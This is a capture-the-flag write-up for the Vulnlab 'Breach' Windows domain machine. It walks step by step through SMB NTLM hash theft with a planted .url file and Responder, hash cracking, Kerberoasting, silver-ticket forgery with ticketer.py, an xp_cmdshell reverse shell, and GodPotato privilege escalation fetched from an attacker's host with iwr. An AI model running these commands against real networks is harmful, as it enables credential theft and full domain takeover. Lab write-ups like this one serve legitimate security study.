Breach
(Medium , Windows , Vulnlab Machine )
OVERVIEW
So we are given the machine IP and told that the user flag is in C:\share\transfer . Let’s scan the machine for open ports and services using Nmap
ENUMERATION
So As you can see many ports are open and we also got the Domain Name and Domain Controller also so update this information in /etc/hosts
Let’s first check SMB shares:
Since we have not gotten the username and password we will try with Guest/Anonymous Login
I am using smbmap you can use netexec also
We found 3 shares in which we have Read Access to Two shares and READ,WRITE access to one share.
Lets check out share using smbclient
On accessing share we found three directories in which two are empty and when we go to the transfer directories then there are 3 more user directories whose listing file permission is denied .
Since we have Read and Write access on share we can steal NTLM creds by uploading the file in the share using smbclient
GETTING NTLM HASH
For this I am using ntlm _theft tool to generate the files.
So we will use the icon file and move it to the directory where you will use smbclient from do change the icon file name to shell.url for readability.
First Turn On The Responder on another terminal using
sudo responder -I tun0 -wdv
Now Login to Smbclient again and go to transfer directory and put the shell.url inside it and wait for 2 minutes and you will get the NTLM hash of Julia.Wong user
Now save the hash in the hash.txt and use John The Ripper to crack the hash to get the password using rockyou.txt wordlist.
Now check if its valid or not using netexec
It is valid
USER FLAG
Now you can get your user.txt from the C:\share\transfer using smbclient and logined as Julia.Wong
EXPLOITATION
Now As we got a valid user password so we can run Bloodhound to visualize relationships between the users, OU, groups etc
bloodhound-python -u 'julia.wong' -p 'JULIA-PASS' -d breach.vl -ns 10.129.13.42 -c ALL --zip
Now While doing enumeration in Bloodhound we find that there is one other kerberoastable account beside krbtgt which is svc_mssql
While Seeing The Node Info of svc_mssql we find that its Admin Count=False which means we can create its ticket to impersonate high privileged user but first let’s find its password .
Since it is a Kerberoastable account we can use NetExec to get its hash and then crack it OR you can use Impacket-GetUserSPNs query.
Crack the hash using John The Ripper and get the password for svc_mssql and now verify it
Now we got the password for svc_mssql let’s move on to the impersonation of high privileged user using ticketer.py of Impacket
ticketer.py -user svc_mssql -nthash NT-HASH -domain breach.vl -domain-sid DOMAIN-SID -spn SPN administrator
Replace NT-HASH by the hash which you will get by converting the svc_mssql password using this website
https://hashes.com/en/generate/hash
Replace DOMAIN-SID and SPN from the Bloodhound svc_mssql node info.
export KRB5CCNAME=administrator.ccache
Now we can enable xp cmdshell and use it to execute a reverse shell to get shell as breach\svc_mssql
enable_xp_cmdshell
xp_cmdshell powershell-base64-rev-shell-payload
Use the reverse shell payload from https://www.revshells.com/ and start the listener
PRIVILEGE ESCALATION / ROOT FLAG
Lets see what privileges the user got
As you can see we have SeImpersonatePrivilege Enabled
So we can use GodPotato and SweetPotato
Use python server using
python3 -m http.server 8000
Now Import it into the shell using iwr in C:\Users\svc_mssql\Documents
iwr http://YOUR-IP:PORT/GodPotato-NET4.exe -OutFile GodPotato-NET4.exe
Now run
.\GodPotato-NET4.exe -cmd 'powershell-revshell-base64-cmd' #be sure to change the port
Now See In your Listener you will get the shell as NT Authority\system and then get the root flag
WE FINALLY DID IT !!!! CHALLENGE SOLVED !!
For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com
THANKS FOR READING !!!
